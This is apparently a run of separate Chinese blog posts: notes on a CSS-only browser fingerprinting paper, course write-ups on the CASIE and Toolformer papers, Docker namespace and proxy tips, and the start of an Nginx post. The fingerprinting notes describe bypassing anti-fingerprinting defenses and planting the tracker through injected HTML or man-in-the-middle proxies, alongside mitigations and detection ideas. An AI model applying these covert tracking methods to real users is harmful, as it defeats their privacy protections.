一个例子如下图所示，如果对应 media 特性被满足，则页面上将出现一个宽度为 2px 的 HTML 元素。最后，通过 iframe 探测相关 HTML 元素的尺寸，即可了解有哪些元素被渲染，反推出浏览器支持哪些 media 特性。

为优化性能，文章将构造的 HTML 元素根据它们所识别的属性进行分组，目的是最大限度地提高容器在辨别特定环境特征时的熵，并满足主 iframe 的高度限制。

对于同一组的 $n$ 个元素，支持对应属性则 $b_i=1$ ，否则 $b_i=0$ ，其总宽度或高度为

$$\sum_{i=0}^{n-1} b_i * 2^i $$

总和是基于 2 的幂次的独特组合，因此可推断每个 $b_i$ 的值。

定义了 3 个检测 Level，尽可能用上 @media 支持的属性，实现细粒度地检测设备特征。

方法部署

有几种常见的方式：

• 诱使用户访问专门的指纹识别网站
• 能够将一行 HTML 代码注入到合法网页中，使得用户响应中包含指纹识别负载
• 利用中间人代理服务在代理的网页响应中注入指纹代码。

实验结果

指纹识别防御的绕过

在 Firefox、Brave、Tor、Safari、Opera 等浏览器及相关隐私插件上进行测试，评估方法的抗指纹防御能力。

执行效率

网络方面，对 @font-face 的优化以及合理排布构造的 HTML 元素，大大减小少了网络请求数量。经传输压缩后，传输的资源约为 330 KB。

客户端开销方面，与 FingerprintJS 进行了对比。发现本文方法在 domInteractive 时间方面（DOM 树已准备好，可进行用户交互）比 JS 方法耗时更短，但 domComplete 时间显著增加了，对页面的加载效率影响还是较大的。总体上整个页面的加载时间小于 1 秒。

【问题：在老旧设备上呢？毕竟实验是在i9 macbook 上做的。】

实测研究

总体效果

作者在三个不同在线门户网站上部署了指纹识别系统，进行了为期9周的试点研究。用户对象主要是计算机科学家，且提前公布了这项研究计划，作者认为这些用户的隐私意识更强。结果表明提出的 StylisticFP 与 FingerprintJS 效果相当。

碰撞稳定性

• 跨访问稳定性方面：FPJS 在跨访问时因计算出不同指纹而无法识别 188 台设备，而本系统仅对 41 台设备失效，说明本系统在多次访问过程中更稳定，即相对不易因访问的变化而产生指纹的大幅变动，减少了因跨访问不稳定导致的识别失败情况。
• 跨设备稳定性方面：这种碰撞发生在具有软硬件的多个设备被分配相同指纹值的情况下，反映了在不同设备之间，由于系统的某些特性（如风格指纹相对稳定），可能会出现无法准确区分设备的情况。

💡 这里可以看出，指纹风格的稳定性需要找到一个合适的值。如果过于稳定，虽然在一定程度上保证了系统的可靠性和一致性，但会导致在相对同质的设备环境中出现较多碰撞，影响对设备的精确区分；而如果稳定性太差，像 FPJS 那样在跨访问时频繁改变指纹，又会导致大量设备无法被识别，降低系统的有效性。

实际上，既然该实验场景存在能够唯一确定用户的会话（Session）信息，我觉得评价指纹与用户身份之间的对应关系时，可采用标准化互信息（Normalized Mutual Information, NMI）作为指标，即：

$$ NMI(S,F) = \frac{2\cdot I(S;F)}{H(S) + H(F)} $$

$$ I(S;F) = H(S) - H(S|F) = H(F) - H(F|S) $$

其中，$I(S;F)$ 表示会话（Session）与指纹（Fingerprint）之间的互信息，反映两者共享的信息量，$H(S)$ 和 $H(F)$分别为会话和指纹的熵，表征各自的不确定性。

当指纹与会话完全一一对应时，条件熵 $H(S|F)$ 和 $H(F|S)$ 均为 $0$ ，此时 $NMI=1$ ；若两者完全独立，则 $NMI=0$ 。

特征熵值

作者采用 AmIUnique 提出的归一化香农熵来量化各种指纹识别特征的判别能力，如表1所示。

总之，实验表明隐式风格指纹不仅是现有技术的可行替代品，而且具有足够的辨别力，可以在现有的防御措施面前胜过 FPJS。

总结与思考

这篇文章巧妙利用了不同浏览器对 HTML 元素的显示差异，以及 CSS 中提供的媒体查询特性，将浏览器环境的属性差异转化为布局差异，再通过隐藏的 iframe 测量这些尺寸差异，将浏览器环境信息反馈给服务端并反推出属性。

这种不基于 Javascript 的新型指纹识别方法在对抗指纹防御方面有本质的优势，但 CSS 指纹识别能力较为局限，文章解决了其中几个关键问题：

1. 指纹属性局限性：先前 CSS 技术依赖的媒体特征有限，仅使用如 “any-pointer” 等常见的有限的媒体特征。本方法全面挖掘了 CSS 的潜力，支持23种媒体特征，在识别性方面达到 FPJS 的水准。

   为什么别人没想到或者用得少呢，是什么原因？

2. 性能问题：以往技术会产生大量网络请求，如某些方法生成 1347 个请求，而本方法通过优化设计（包括探针 HTML 元素的分组和幂次尺寸编码、字体 fallback 机制），显著减少了请求数量（优化后仅 83 个），降低网络占用。
3. 抗防御能力不足：如 Tor 禁止 @font-face 本地文件使用和强制某些媒体查询返回固定值会使先前技术失效，而本方法使用隐式推断，能有效绕过部分防御。

未来工作

缓解措施

作者提到两种可能的缓解措施：

1. 完全阻止 iframe，但这会导致许多网站工作不正常。
2. 阻止 media query，例如 Tor 就会报告一些虚假的媒体特性。然而欺骗所有媒体特性是不可行的，因为它们是响应式网页设计的关键部分。
3. 动态监控向服务端的资源请求；或者随机向 CSS 属性添加噪声。

该工作没有开源，对于缓解措施方面难以实际测试。但基于对论文的直观理解，我认为该方法的特征还是比较明显的，具有一定可检测性，在“问题讨论”章节继续展开。

非追踪用例

本研究侧重于风格指纹带来的隐私威胁，但浏览器指纹识别也可用于安全应用，如账户保护、风险控制等。

问题讨论

可检测性

基于论文核心技术点，检测逻辑可以聚焦以下特征：

1. iframe 内容可见性：大量透明、不可见背景的 iframe
2. 密集媒体查询：大量 min-width/min-height 的 CSS media query 规则
3. 字体指纹：使用 @font-face 加载本地字体
4. 广告拦截探针：包含触发多款广告拦截器的元素
5. 网格布局：使用 CSS Grid 对角线排列元素

最明显的一点在于， 为了不影响网页正常显示，以上特征元素均置于同一个 iframe 中，即 $800 \times 1000$ px 的 main iframe。

然而在实际部署中，可以通过页面间随机化探针布置等方式减少过于集中的特征。最关键的在于，作者提供了一种新的“风格指纹”思路，证明追踪者利用隐式技术追踪用户是可行的。

移动端可能显示异常

原文 2.5-HTML Element Arrangement 小节中提到：“我们将所有元素放置在一个 800px x 1000px 的 iframe（以下简称主 iframe）中，以确保元素的尺寸在不同的屏幕分辨率下保持一致。”

根据非权威统计数据显示，2024 年移动端浏览器典型分辨率为 $360 \times 800$ px，低于 main frame 所需尺寸，可能使浏览器出现非预期的滚动条，或者无法正常测量。

其他思考

1. 无 JavaScript 实施 XSS：

   1	M. Heiderich, M. Niemietz, F. Schuster, T. Holz, and J. Schwenk, “Scriptless attacks: stealing the pie without touching the sill,” in Proc. ACM Conf. Computer and Communications Security, 2012.

   https://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf

   http://lcs.ios.ac.cn/~sws/downloads/liangbin.pptx

2. 由 csstracking.dev 开源的 CSS 指纹项目：https://github.com/OliverBrotchie/CSS-Fingerprint

本文是我在《机器学习》课程上完成的结课作业。 CASIE聚焦于网络安全文本领域的命名实体识别和事件抽取，针对网络安全领域的关注点，对事件和类别做了针对性的特征工程。采用 BIO 标注体系，Bi-LSTM + Attention 作为基础模型，并对比了多种 Embedding 模型对效果的影响，具备很高的实用价值。作者来自马里兰大学，文章发表在 AAAI 2020。

摘要

现有的事件抽取方法主要关注人物相关的信息，这些方法与网络安全事件抽取的核心区别主要有：a) 所需领域专业知识不同；b) 事件本身复杂性不同。本文的主要贡献有：

• 定义了五种网络安全事件及其语义角色，以及20种角色参数类型。
• 贡献了一套新闻通讯语料库，对网络安全事件进行了标注。
• 提出 CASIE 网络安全事件信息提取模型和工具。

问题建模

在事件抽取步骤中，定义了如下概念：

• Event Nugget: 事件片段，指清晰描述事件的单词或短语。
• Event Argument: 事件参数，指事件参与者或属性值。
• Role: Nugget 和 Argument 之间的语义关系。
• Realis: 具有 Actual、Other、Generic 三种取值。

对于攻击和探测事件，定义的子类型有：Attack.Databreach、Attack.Phishing、Attack.Ransom、Discover.Vulnerability、Patch.Vulnerability。

方法

主要包括六个步骤：事件片段识别、事件参数识别、事件参数与角色的关联、事件真实性识别、事件核心参照、映射至知识图谱。本文主要聚焦于前四个步骤。

事件片段及其参数识别（Event Nugget and Event Argument Detection）

特征工程

对于一个 NLP 入门学习者来说，首先需要了解一些前置知识。包括：

• 浅层句法组块（Shallow Syntactic Chunk）：指对句子进行分析时，按照一定的语法规则和语义关系将连续的单词组合成的较大的语言单位。例如名词短语（NP）、动词短语（VP）、句子（S）。
• 依赖树（ Dependency Tree）：表示单词之间的依存关系，例如在句子 “The boy kicks the ball” 中，“kicks” 是核心动词，“The boy” 是动作的执行者（通过 nsubj 依存关系连接），“the ball” 是动作的对象（通过 dobj 依存关系连接）。

在事件片段特征方面，首先使用斯坦福推出的 NLP 工具套件 CoreNLP 对原文进行预处理，包括分词、词形还原、词性标注和命名实体识别、停用词去除。为了更好地涵盖软件名称、恶意软件等实体，还引入了 DBpedia Spotlight 和 Wikidata 两个外部知识库。

在事件参数特征方面，结合了事件片段中的部分特征，并进一步细化和补充。例如确定每个单词的浅层句法组块类型及深度、最近事件类型等特征，使其能够更精准地定位和关联与事件相关的元素，具体特征如下：

• 每个单词的浅层句法组块类型（如 S、NP、VP 等）及其深度（选择分析树中的最低层级）。
• 最近事件的类型（即五种事件类型）。
• 在依赖树中到最近事件核心词的距离（关系跳数）。
• 与最近事件核心词的相对位置（如在同一句子之后、在同一句子之前、在不同句子之后、在不同句子之前）。
• 到最近事件核心词的依存分析路径（如 conj - nmod - nsubj 等）。
• 与最近事件核心词的共同成分分析树节点（如 NP、PP、VP 等）。

词嵌入方法

作者尝试了比较多的 Embedding 方法，并在后续实验中进行了对比，包括：

• 上下文无关性 Embedding：通过不同语料训练的 Word2Vec，包括Transfer-Word2vec、Domain-word2vec、Cyber-Word2vec。
• 上下文相关的 Embedding：BERT-Base Uncased 预训练模型。

值得注意的是，作者并没有直接使用 BERT 原始的输出作为最终的嵌入结果，而是经过实验对比，选择倒数第四个隐藏层的输出作为更优的词嵌入表征。这也是我们值得学习的思路。

模型结构

将各个语义特征的 Embedding 值进行聚合，使用 Bi-LSTM + Attention 提取特征，经过一层带 Dropout 的全连接层后输出，再使用 CRF(条件随机场) 得到 B-I-O 序列标签，具体如下。

• Embedding Layer：把每个语言特征（包括单词序列，也包括POS、NER、Dependency等特征序列）的嵌入层进行聚合（Concatenate）。对每个特征，输出大小为类别总数的一半。对于单词序列，不同的单词就作为不同类别。
• LSTM Layer：一层 Bi-LSTM 。
• Attention Layer：使用 Location Attention 机制，属于传统 Attention 的变种，引入位置信息来增强注意力权重计算，通常会与内容注意力（Content-based Attention）结合使用，形成 Content-Location Attention。
• CRF层：条件随机场，捕捉标签之间的依赖关系，提高序列标注的准确性。

这里有一个问题，在原文中并没有详细说明如何计算的 Location Attention 分数，在开源的代码来看是调用了 keras 的 SeqSelfAttention，似乎没有体现 Location Attention。但不妨来学习一下，Location Attention 的注意力权重通常可表示为

$$ \alpha_t=Softmax(f_{content}(x_t)+f_{location}(t)) $$

内容注意力比较熟悉：

$$ f_{content}(x_t)=q_t^T k_i $$

位置注意力有多种运算方法，例如位置编码、卷积操作等。使用位置编码时，可表示为：

$$ f_{location}(t) = v^T \cdot p_t $$

其中 $v$ 是可学习的线性变换权重矩阵，$p_t$ 是位置 $t$ 的编码向量。例如在 Transformer 中，位置编码通常使用正弦和余弦函数生成。

事件参数与角色关联（Event Argument and Role Linking）

为每个事件参数分配一个角色标签，如表1所示。

特征工程

提取以下特征：

• 事件参数表面词的词向量
• 事件片段特征工程的(2)、(3)、(8)项，即 CoreNLP/DBpedia 实体类别、Wikidata 相关类别、关系跳数（hops，取依赖关系树中到最近事件节点头的距离）。
• 目标事件参数类型、目标事件参数的左右侧事件参数类型。

模型结构

包含一个嵌入层和三个全连接层，单词嵌入层经过两个全连接层，然后与其他特征的嵌入层连接。

由于在预测参数角色之前已经知道了事件类型，因此为每种事件建立单独的神经网络，从而排除无关类型。

事件真实性识别（Event Realis Identification）

将事件真实性分为 Actual、Other、Generic。当找到事件片段（Nugget）后，realis 特征向量就是 Nugget 及其周围词向量的聚合。实验表明以7个单词为上下文窗口的效果最佳。因情态动词和否定词是事件真实性的重要证据，因此停用词也包含在 realis 识别中。

识别分为两步，首先识别是否为 Generic，若为 Generic 则进一步识别是 Actual 还是 Other。模型结构也较为简单，包括一层 Embedding 和两层全连接层。

数据集及实验

在数据集标注方面，选取了 5000 篇网络安全新闻（Cyberwire 2019），对其中包含文中所提到的五个事件的文章进行人工标注，约 1000 篇。

评估指标

采用为 TAC 事件任务（NIST 2015）开发的指标，通过计算事件要点或参数提及范围与真实范围的重叠来评估。

TAC KBP 2015 包含事件块（Event Nugget）任务和事件论元（Event Argument）任务，与本文一致。通过 Precision、Recall、F1 指标来评估。

交叉验证

使用 900 篇文章进行 8 折交叉验证训练模型，并使用 100 篇文章进行测试，多次运行取平均分数。

消融实验

对 Nugget 和 Argument 检测的特征进行分组，进行消融实验，展示了不同特征集对检测结果的影响。

对比多种 Embedding 方法

对预训练的 BERT、Transfer Word2vec、Domain Word2vec、Cyber Word2vec 等不同词嵌入方法进行测试。结果表明，预训练 Bert 多项指标均高于 Word2vec。在 Word2vec 行列，Domain Word2vec 表现最佳。

总结与思考

这篇文章属于深度学习时代的 NLP 典型任务在网络安全领域的应用，尽管在大模型时代来看，其需要额外附加外部知识、精心做特征选择。对我的启发主要有以下：

• 领域针对性设计：传统事件抽取多关注人物相关信息，而本文针对网络安全领域，明确了其与通用领域在专业知识和事件复杂性上的差异，进而定义特定的网络安全事件、语义角色及角色参数类型。
• 分层特征设计：在不同任务步骤（如事件参数与角色关联、事件真实性识别）中，针对具体任务需求，设计与之匹配的特征，这种分层和针对性的特征设计思路，有助于模型在不同子任务中更好地捕捉关键信息。
• 词嵌入方法对比：尝试多种词嵌入方法，并对 Bert 输出层进行选择优化，而不是直接采用 Bert 的最终输出。
• 交叉验证与消融实验：通过8折交叉验证训练模型多次取平均分数，以及对特征分组进行消融实验，增强了实验的完备性。

本文是我在《自然语言处理》课程上完成的论文阅读作业之一。 Toolformer 聚焦于提升 LLM 通过 API 调用外部工具的能力，提出了 Toolformer。通过对 API 文档和示例的自监督学习，模型可以在问题中有效地决定何时调用、调用何种工具、传入的参数、最优的结果。作者来自 Meta 公司和 Universitat Pompeu Fabra，发表在 NIPS 2023。

原文地址：arxiv/2302.04761

引言

大语言模型尽管在 zero-shot 和 few-shot 问题上有很大提升，但由于模型离线性和自回归本质等因素，其本身存在一些限制，包括：

• 无法获取最新信息
• 存在幻觉现象
• 小规模LM的推理能力欠缺
• 缺乏数学运算能力
• 无法感知时间进程

因此，常用的解决方案是让模型能够调用外部工具，用工具的输出来补充或改写上下文。然而，现有的方法主要有两大不足：依赖人工的大量标注，或者只局限于特定任务中。

读到这里很容易想到 Langchain 框架，其也可以轻松地访问外部工具。我们在编写自定义工具时只需在注释中给出工具的简要介绍、参数定义，框架随后在遇到相关问题就会自动选取合适工具并调用。Langchain 应该主要对应提到的第一种不足。

作者认为优秀的 API 工具选择器应具有以下特征：

• 工具选择的学习应该是自监督的，不依赖大量的人工标注。因为人工标注不仅成本高，且人类认为重要的内容不一定是模型认为重要的。
• 外挂工具后，LM 应不丢失其通用性，并且可以自主决定何时、采用何工具。模型应能更全面地使用工具，而不局限于特定任务。

文章最核心的部分，在于提出的自监督数据集的构建方案。首先对数据集中输入文本$x$进行位置划分，对于每个分割点$i$，选出Top $n$个候选 API $C_i^{j}$，随后分别执行得到结果$r_i^j$。分别计算执行结果与next tokens的损失$L_i^j$，若结果表明能降低损失，则保留该候选 API。

因此，只需要少量人工编写的 API 示例，LM 就可以构造大批工具调用数据集。最后，使用这些数据集微调模型即可。作者在 GPT-J 模型（参数量6.7B）上实验，结果表明大幅提升了模型 zero-shot 能力，在多个任务上超出了规模大很多倍的 GPT-3 模型。

读前问题

在继续阅读论文主体之前，有以下几个问题和思考：

1. 文章提到人工标注工具选择开销较大，那么什么时候才会遇到有大量API需要标注的情况？对于一个实际的大模型，外挂的每个工具 API 应该都需要单独开发的，像 Langchain 那样在 API 编写过程中加入少许提示即可。有没有与 Langchain 的定量对比？

   读后回答：没有做这方面实验，文中主要在 GPT-J 上设计对比实验，证明 Toolformer 预训练有效，但未与其他调用工具的方式做对比。

2. ”人类认为有用的提示“和”模型认为有用的提示“有何区别？有没有做这方面实验，如果有的话那对 Prompt 编写会是很好的启示。

   读后回答：没有做这方面实验，因为数据集规模比较大（只一个QA问答数据集就接近20k条），人工编写难度大。

3. 框架中分割位置$i$是如何确定的？

   读后回答：通过提示工程，给出 Bootstrap Prompt，让模型自己判断。

4. Next Tokens的loss计算的窗口大小是多少？感觉也会影响到最终效果。

   读后回答：是从当前位置$i$一直计算到序列结尾，即从$x_i,…,x_n$。每个位置的损失计算主要考虑在该位置进行 API 调用（有响应或无响应）与不进行 API 调用时模型对后续标记预测的影响，理论上是对每个 API 调用位置独立评估其对模型预测的帮助程度。

   因此，感觉当多个 API 调用的结果组合起来才能更好地帮助模型预测时，当前的损失计算方式可能无法完全捕捉到这种复杂关系。

5. 文中方法需要对模型进行 Fine-tune，对比提示工程来说效果怎样？

   读后回答：这方面没有作对比。

方法

数据集构建

文中通过自监督实现了 API 调用数据集构建，通过编写一段预提示（Exemplary Prompt，有的论文也叫 Bootstrap Prompt），让 LM 完成 API 调用位置选择，执行选出的 API 拿到结果，随后过滤得到有效的 API 调用。

非常值得学习的是他们评估一个 API 调用是否有效的方法，通过比较加入 API 前后生成序列 Loss 的差异，来定量评估了效果。这比现在大模型工作的许多评估（WinRate、ELo、NLP指标等）更具表现力。此外，他们解决“何时调用”的方案也十分精巧，是直接获取解码序列每个时刻的输出 Top-K，设定开始符号的概率阈值来判断，这是 Langchain 等将模型完全视为黑盒的框架所做不到的。

预提示构建

Exemplary Prompt 如原文 Figure3 所示。

将 API 调用部分以特殊起止Token $\verb|<API>|\space\verb|</API>|$ 包裹。作者为实验可操作性起见，并没有因此而修改词表，而是将起止和结果符号用”[“、”]”、”->” 代替了。这点是我们值得借鉴的。

为了衡量加入 API 后是否对预测有帮助（即损失降低），定义了仅包含 API 调用、包含 API 调用及结果的提示词

$$ e(c) = \verb|<API>| a_c (i_c) \verb|</API>| \space\space e(c,r) = \verb|<API>|a_c(i_c)\rightarrow r \verb|</API>| $$

Sampling API Calls

也就是让模型决定哪里需要进行 API 调用，解决 “When” 的问题。具体步骤是：

• 生成提示（Prompt）：对于每个 API ，根据 Exemplary Prompt 编写提示 $P(x)$，以鼓励 LM 在示例输入序列 $x=x_1, … ,x_n$ 中添加 API 调用注释。
• 计算概率：计算模型 $M$ 在每个位置 $i\space (i\in{1, … ,n})$ 开始API调用的概率 $p_i = p_m(\verb|<API>||P(x), x_{1:i-1})$。
• 确定候选位置：设置采样阈值$\tau_s$，保留所有$p_i > \tau_s$的位置 $I={i | p_i > \tau_s}$。如果得到位置超过$k$个，则仅保留前$k$个。
• 采样API调用：对于每个位置$i\in I$，以$[P(x), x1, …, x_{i-1},\verb|<API>|]$为前缀，$\verb|</API>|$为结束标记，形成最多m个 API 候选调用 $c_i^1,…, c_i^m$。

Executing API Calls

执行每个API $c_i$，得到结果$r_i$。

Filtering API Calls

• 计算损失：对于序列 $\textbf{X}=x_1, …, x_n$，有候选 API $c_i$ 及其响应 $r_i$，给定权重序列 $(w_i | i \in \mathbb{N} )$，计算两个加权损失 $L_i^+$ 和 $L_i^-$。简单来说，前者为加入 API 调用及其结果后的损失，后者为不进行 API 调用和进行 API 调用但不提供响应这两种情况下损失的最小值。直观上，如果$L_i^-$较大而$L_i^+$较小，说明进行 API 调用后更有帮助。
• 筛选有用的API调用：给定阈值$\tau_f$，保留$L_i^- - L_i^+ \geq \tau_f$的调用。

模型微调

对构建的数据集进行微调，只对需要的位置进行 API 调用序列的插入，而不改变其他内容，以此保持模型的通用性。

模型推理

当解码时遇到$\rightarrow$ Token 时（即”->”），暂停输出，调用对应 API ，并将结果加入到解码序列中，继续完成解码。

实验部分

作者主要进行了三方面的实验：一是测试提出的 API 调用选择方法是否在下游任务中真正有效；二是验证该方法不会损害 LM 本身的核心能力；三是测试不同规模的模型对工具调用的影响。

选用工具

在挑选所使用的工具时，遵循两个原则：一是输入输出都可以用文本表示，二是可以获知他们用途的一些演示。因此，作者选用了问答系统、维基百科搜索、计算器、日历、机器翻译系统这几类 API 来做测试。

实验场景

数据集选用 CCNet 子集 $\mathcal{C}$。CCNet 他是一个从网络抓取数据中提取高质量单语数据集，发表在 LREC 会议上：CCNet: Extracting High Quality Monolingual Datasets from Web Crawl Data。作者采用“启发式”方法创建了 CCNet 子集，例如判断文本中是否包含三个操作数，来决定是否保留作为 Calculator 任务的数据集，从而大幅缩减数据量。

模型选用 GPT-J，是一个基于 GPT-3 的具备6B参数量的模型。截止2022年，它是目前公开可用的Transformer语言模型中，在各种下游zero-shot任务上表现最好的。Hugging Face: GPT-J 6B。文章还选用了规模大许多倍的 OPT（66B）和 GPT-3（175B）模型，来验证模型大小对工具调用的影响。

参数方面，设定权重函数 $w_t$，来确保 API 调用发生在 API 提供的信息对模型实际有帮助的位置附近。对于 API 的采样阈值 $\tau_s$和筛选阈值 $\tau_f$，每个工具是独立选择的，可见原文 Table 2。

对比实验做了三个场景：

1. GPT-J + CC：用 CCNet 子集 $\mathcal{C}$ 微调的 GPT-J。
2. Toolformer Enabled：用文中方法制作的数据集 $\mathcal{C}^*$微调 的 GPT-J。
3. Toolformer Disabled：使用2中所得模型，但解码时屏蔽所有 API Call。这是通过手工将每个位置解码输出中 $\verb|<API>|$ Token 的概率改为0实现的。

这里设计的3个对比场景值得学习。不难看出，1和2对比主要是为了证明在微调过程中引入 API 调用是否能提升模型的性能，即模型是否能学习到在合适的时机调用合适的工具来辅助处理任务。2和3对比主要是证明调用 API 之后是否真正能提高模型解决问题的能力，进一步验证使用工具的必要性。

在模型解码方面，采用贪婪解码，当 Top-10 Token中包含 $\verb|<API>|$ 时则直接选用 $\verb|<API>|$。

效果评估

• 通用知识评估：使用 LAMA Benchmark 的 SQuAD, Google-RE, T-REx 三套数据集来评估，用来检测语言模型中包含了多少的事实类与常识类的知识。值得注意的是，由于 LAMA 基于直接从 Wikipedia 获取的语句，作者阻止了 Toolformer 使用 Wikipedia API，以避免获得不公平的优势。

• 数学能力评估：使用 Math Benchmarks 来评估，这是UC Berkeley提出的一个用于评估机器学习模型的数学问题解决能力的数据集。
  

• 问答能力评估：使用 LAMA Benchmark 的 WebQS、NQ、TriviaQA 三套数据集来评估。在一系列对比中，Toolformer 的成绩仅比 GPT-3 略低一筹。同时，还使用带有时间的数据集来评估其时间进程方面的能力，这一点超过了 GPT-3。
  

• 多语种问答：使用 MLQA 来评估多语种问答能力，即上下文以英文表示，而问题是其他语种（包括中文）。结果表明在某些语言上，使用Toolformer会使效果变差。但是每种语言的 Toolformer(disabled) 都比 Toolformer 低，说明 API 调用是有用的，作者认为表明它已经学会使用机器翻译工具。

  另外，作者认为OPT和GPT-3多语言能力较低的原因是没在多语言数据集上训练。最下面两组 All En 的测试证明了这一点。

汇总结果如下，证明了 a. 调用工具API确实对提升问题解决能力有效; b. 使用 Toolformer 预训练的小规模模型在后续 Zero-shot 方面能力超过大模型 GPT-3。

至此，文章完成了对于第一个方面的实验，即 Toolformer 方法有效提升了模型在下游任务中的能力。

对于是否会损害模型本身建模能力、不同规模模型对工具调用的影响，作者在4.3和4.4小节做了简要描述，结论如下：

• 对模型训练的困惑度进行评估，表明 Toolformer 对模型本身建模能力影响不大。
• 提供工具的能力在约 775M 参数时才出现，较小模型使用和不使用工具性能相似。
• 模型规模增大时，不使用 API 调用解决任务的能力变好，同时利用 API 的能力也提高，但即使最大模型，使用和不使用 API 调用的预测之间仍有较大差距。

局限性

作者提到一个明显的局限是无法链式调用工具，因为每个 API Call 位置都是独立生成的。这点很好的解答了读前的问题4。同时，数据集生成的效率比较低，因为需要对每个文档单独进行提示工程推理，例如处理一百万份文档后，只能得到几千个有用的计算器 API 调用示例。最后，当前的 Toolformer 并未将调用 API 的成本纳入考虑。

总结与思考

这篇文章我认为启发有以下几点：

• 方法方面，结合提示工程设计了自监督的训练方案，使其可以用简单的 Loss 作为监督条件，来生成 Fine-tune 所用的数据集。在许多大模型 Fine-tune 的文章中，数据集生成是一个痛点，人工标注代价太大，而使用第三方大模型生成又无法保障质量。
• 技巧方面，对开源大模型的 Decoding 原始输出进行了利用和改造，没有将其完全作为黑盒来 Fine-tune。
• 评估方案方面，精巧的设计了几个对比实验，有力地证明了方法有效性。同时，还对方法本身之外的两个问题（是否导致困惑度增大、LM 规模与工具调用能力的关系）进行了测试，使结论更加充实。

同时，关于本工作我还有自己的几点思考：

• 该方案本身无法实现链式的工具调用，若想基于它实现的话，感觉可以尝试通过多轮对话的方式形成多个 API 调用点，从而构成简单的 CoT。
• 该方案需要对 LM 进行微调，使其获得选择 API 的能力。若模型规模特别大，微调将花费较大的时间和成本。除了使用更精简的微调技术外，感觉可以尝试大小模型协作的方案，例如使用提示工程让大模型初步分析可能的 API 调用位置，再让 Toolformer 小模型进行更精细的 API 调用决策和参数调整。
• 很希望将这个方法与纯 Prompt方式的（例如langchain）工具框架进行对比，看看哪种方式更有效。

1. pid与进程隔离

问题出现

我意识到这个问题，是源于一次elasticsearch的使用。我在宿主机中安装了es，但现在需要另一个版本的es，为方便安装，就用docker启动了一个。

时隔多日，我忘记了自己在docker中还启动了一个es服务。当需要kill掉它们时，却发现kill -9 {pid}后，会自动重启。在宿主机上ls这个目录，也找不到对应的文件。

最后才想起来是自己Docker启动的es，令好友也倍感诧异…

甚至在Docker官方社区中，我们也能看到这样的讨论：

其实，在宿主机中使用ps/htop等命令能看见Docker进程是正常的。这是由于Docker 是基于 Linux 内核的 Namespace 技术实现资源隔离的，所有的容器都共享主机的内核。

什么是Namespace

​Namespace 是 Linux 内核的一项功能，该功能对内核资源进行分区，以使一组进程看到一组资源，而另一组进程看到另一组资源。Namespace 的工作方式通过为一组资源和进程设置相同的 Namespace 而起作用，但是这些 Namespace 引用了不同的资源。资源可能存在于多个 Namespace 中。这些资源可以是进程 ID、主机名、用户 ID、文件名、与网络访问相关的名称和进程间通信。

​ 简单来说，Namespace 是 Linux 内核的一个特性，该特性可以实现在同一主机系统中，对进程 ID、主机名、用户 ID、文件名、网络和进程间通信等资源的隔离。Docker 利用 Linux 内核的 Namespace 特性，实现了每个容器的资源相互隔离，从而保证容器内部只能访问到自己 Namespace 的资源。

Linux中定义了6种Namespace：

Docker中对Namespace的使用

在宿主机上，可以观察到Docker 守护进程为每个容器创建了六种 namespace 的实例，并且由内核管理这种映射关系。

那么，这种映射关系是由谁创建的呢？Docker 的运行时组件（如 containerd、runc 等）负责创建和管理容器，在创建容器时会配置 PID namespace。

Cgroups

Namespace提供了资源隔离，而Cgroup则可以说是提供了资源管理。

Linux Cgroup 可让为系统中所运行任务（进程）的用户定义组群分配资源 -–— 比如 CPU 时间、系统内存、网络带宽或者这些资源的组合。 您可以监控您配置的 cgroup，拒绝 cgroup 访问某些资源，甚至在运行的系统中动态配置您的 cgroup。 所以，可以将 controll groups 理解为 controller (system resource) (for) (process) groups，也就是是说它以一组进程为目标进行系统资源分配和控制。

宿主机htop中排除Docker容器进程

有了上述基础，实际上我们只需要排除指定的Cgroups就可以。

不妨按F2设置显示CGROUP名称，再F4即可。

2. 网络代理问题

来源： victoruu: 配置docker pull代理

Docker pull代理

在执行docker pull时，如果网络环境较为复杂，我通常通过终端代理命令（例如export https_proxy=http://127.0.0.1:1234）来试图让pull过程走代理，实际上这是没有用的。

在执行docker pull时，是由守护进程dockerd来执行。因此，代理需要配在dockerd的环境中。而这个环境，则是受systemd所管控，因此实际是systemd的配置。

1
2

sudo mkdir -p /etc/systemd/system/docker.service.d
sudo touch /etc/systemd/system/docker.service.d/proxy.conf

在这个proxy.conf文件（可以是任意*.conf的形式）中，添加以下内容：

1
2
3
4

[Service]
Environment="HTTP_PROXY=http://127.0.0.1:8888/"
Environment="HTTPS_PROXY=http://127.0.0.1:8888/"
Environment="NO_PROXY=localhost,127.0.0.1,.example.com"

dockerd 代理的修改比较特殊，它实际上是改 systemd 的配置，因此需要重载 systemd 并重启 dockerd 才能生效。

容器内代理

在容器运行阶段，如果需要代理上网，则需要配置 ~/.docker/config.json。以下配置，只在Docker 17.07及以上版本生效。

1
2
3
4
5
6
7
8
9
10
11

{
 "proxies":
 {
   "default":
   {
     "httpProxy": "http://127.0.0.1:8888",
     "httpsProxy": "http://127.0.0.1.com:8888",
     "noProxy": "localhost,127.0.0.1,.example.com"
   }
 }
}

此外，容器的网络代理也可以直接在其运行时通过 -e 注入 http_proxy 等环境变量。这两种方法分别适合不同场景。
config.json 非常方便，默认在所有配置修改后启动的容器生效，适合个人开发环境。在CI/CD的自动构建环境、或者实际上线运行的环境中，这种方法就不太合适，用 -e 注入这种显式配置会更好，减轻对构建、部署环境的依赖。当然，在这些环境中，最好用良好的设计避免配置代理上网。

Build代理

虽然 docker build 的本质，也是启动一个容器，但是环境会略有不同，用户级配置无效。在构建时，需要注入 http_proxy 等参数。

1
2
3
4
5

docker build . \
    --build-arg "HTTP_PROXY=http://proxy.example.com:8080/" \
    --build-arg "HTTPS_PROXY=http://proxy.example.com:8080/" \
    --build-arg "NO_PROXY=localhost,127.0.0.1,.example.com" \
    -t your/image:tag

参考来源：
https://cizixs.com/2017/08/29/linux-namespace/
https://developer.aliyun.com/article/1406336
https://blog.csdn.net/vic_qxz/article/details/130061661

经过一些探索，发现问题主要来源于上游应用302跳转、set-cookie响应头的secure属性两方面，需要合理调整Nginx的站点配置文件来解决。

This post shows how to proxy HTTPS Exchange Mail service with HTTP protocol when using Nginx reverse proxy. The key point is to handle 302 redirect and secure attribute in configuration of Nginx.

文章参考了 浅流 - Nginx以HTTP反向代理HTTPS服务 这篇文章，但其对Nginx的more_set_headers属性设置有问题，导致set-cookie头从secure属性的后面截断，在具有多个set-cookie响应头的登录场景中不适用。

问题发现
